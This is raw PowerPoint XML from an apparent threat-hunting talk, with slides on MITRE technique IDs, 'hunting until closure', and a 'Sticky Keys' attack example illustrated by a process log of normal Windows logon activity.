            <a:ext cx="461042" cy="122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5756D91D-5F00-097F-1645-37AD1D97CF70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5186723" y="2241231"/>
            <a:ext cx="4571998" cy="510989"/>
            <a:chOff x="4725681" y="1711032"/>
            <a:chExt cx="4571998" cy="510989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7851F436-C859-96BC-31B1-EEE997E6C0B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4725681" y="1711032"/>
              <a:ext cx="1152605" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>T1001</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Straight Connector 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64AEDFCE-3B49-579B-2DC3-EF9CE813508C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1711032"/>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C83C0D-B672-18FD-E0F8-A649D635F5E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1885204"/>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0787AA5-066B-7FB7-5B86-03746A27D145}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2047849"/>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35734D1-6EC9-4835-FFFD-F051E4F545F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2222021"/>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50467C-2DE6-052C-F6FD-0487AC071C46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5878286" y="1864921"/>
              <a:ext cx="2051637" cy="202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EF7701B-7E7B-3C67-A7F9-7908CB60432B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5102198" y="1707207"/>
            <a:ext cx="1237129" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Technique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D5C3D1-FBB1-9DB0-BA70-10E5C8902E52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8732902" y="1707207"/>
            <a:ext cx="1152605" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD6F7A7-2899-95A5-DB56-1E60EB7AE470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5186723" y="3190457"/>
            <a:ext cx="4571998" cy="510989"/>
            <a:chOff x="4725681" y="1711032"/>
            <a:chExt cx="4571998" cy="510989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A7FA0C-D0B3-A9D5-3BC3-5EC09C0AA2BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4725681" y="1711032"/>
              <a:ext cx="1152605" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>T1002</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Straight Connector 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2010497-D70D-5FF2-EE4C-8BB1191698A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1711032"/>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5C61E87-0247-5698-0F37-7AE6D411CEBF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1885204"/>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A4212-64EC-AFE3-D3D2-060B89797C41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2047849"/>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0F709E9-E431-0DA3-F47F-0D83C51EE06A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2222021"/>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5E57CBD-6937-9525-6CA5-E052BD158A65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="27" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5878286" y="1864921"/>
              <a:ext cx="2051637" cy="202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DC36B75A-D5BF-F4DF-D404-7CEF2E16F9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5186723" y="4097981"/>
            <a:ext cx="4571998" cy="510989"/>
            <a:chOff x="4725681" y="1711032"/>
            <a:chExt cx="4571998" cy="510989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="TextBox 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D4F2052-F52E-A7F8-BB91-F8E2D1FA1532}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4725681" y="1711032"/>
              <a:ext cx="1152605" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>T1003</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Connector 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990FE8BD-88C2-2244-E714-2EB0601CE2A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1711032"/>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5551B5-0789-8CEB-4103-8FE423827C17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1885204"/>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AEE055-1865-8A7D-B3B5-572722639A05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2047849"/>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358E2E-D60A-CD0F-E40B-A2F58581FED8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2222021"/>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861A497-26F7-AB5F-97F3-48C06D9EF567}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="34" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5878286" y="1864921"/>
              <a:ext cx="2051637" cy="202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BDF45CC9-FC78-CA2D-A62F-945AE2F32B8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5186723" y="5047207"/>
            <a:ext cx="4571998" cy="510989"/>
            <a:chOff x="4725681" y="1711032"/>
            <a:chExt cx="4571998" cy="510989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DF53A3-7BF1-FDBC-DE88-FCD1110C509A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4725681" y="1711032"/>
              <a:ext cx="1152605" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>T1004</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{837A1546-6C6A-3EDB-5C7E-9A1A1D305A65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1711032"/>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A493463-9C6F-FF14-5748-5A4803D10710}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="1885204"/>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F8FFFF-7F4C-9138-6B27-BD81DBA8E66B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2047849"/>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FD4A296-D3AE-35B7-191E-E960CFA3E890}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398647" y="2222021"/>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FDC239-E4E9-3C95-B078-206EAD58CE70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="41" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5878286" y="1864921"/>
              <a:ext cx="2051637" cy="202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EF899C8A-917B-8C98-2535-03DF01CF6D30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245981" y="6530400"/>
            <a:ext cx="10860157" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Think about hunting results as a set and hunt until you find the closure of the set</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="898085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3" grpId="0"/>
      <p:bldP spid="24"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Hunting until Closure Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809585" y="4105796"/>
            <a:ext cx="3619209" cy="27204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074" y="4047581"/>
            <a:ext cx="2901434" cy="12030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074" y="5431401"/>
            <a:ext cx="3169955" cy="1623992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="17184145" flipV="1">
            <a:off x="4616020" y="4308789"/>
            <a:ext cx="1550540" cy="1496839"/>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FFC000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1492094" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1632" kern="0" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="4415855">
            <a:off x="4703449" y="5532701"/>
            <a:ext cx="1550540" cy="1496839"/>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FF0000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1492094" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1632" kern="0" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176978" y="1492946"/>
            <a:ext cx="7570019" cy="2562522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048090" y="2990458"/>
            <a:ext cx="812636"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31606" y="3274294"/>
            <a:ext cx="4107445"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02F8B2-EBC3-8EB3-0D5C-28B6D825EFA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480867" y="1129553"/>
            <a:ext cx="4387583" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The “Sticky Keys” Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3220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Hunt to find successful attacks…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252724" y="2245327"/>
            <a:ext cx="11410875" cy="3043654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 16:35:22.4527963 winlogon.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   16:35:22.4527963 winlogon.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     16:35:23.0309213 """LogonUI.exe"" /flags:0x0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     16:35:27.1090463 C:\Windows\system32\userinit.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       16:35:27.5152963 C:\Windows\Explorer.EXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 16:35:35.1246395 """C:\Windows\System32\ie4uinit.exe"" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EnableTLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         16:35:35.1402644 """C:\Windows\System32\ie4uinit.exe"" -DisableSSL3"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         16:35:35.1402644 """C:\Windows\System32\regsvr32.exe"" /s /n /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i:U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1224" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
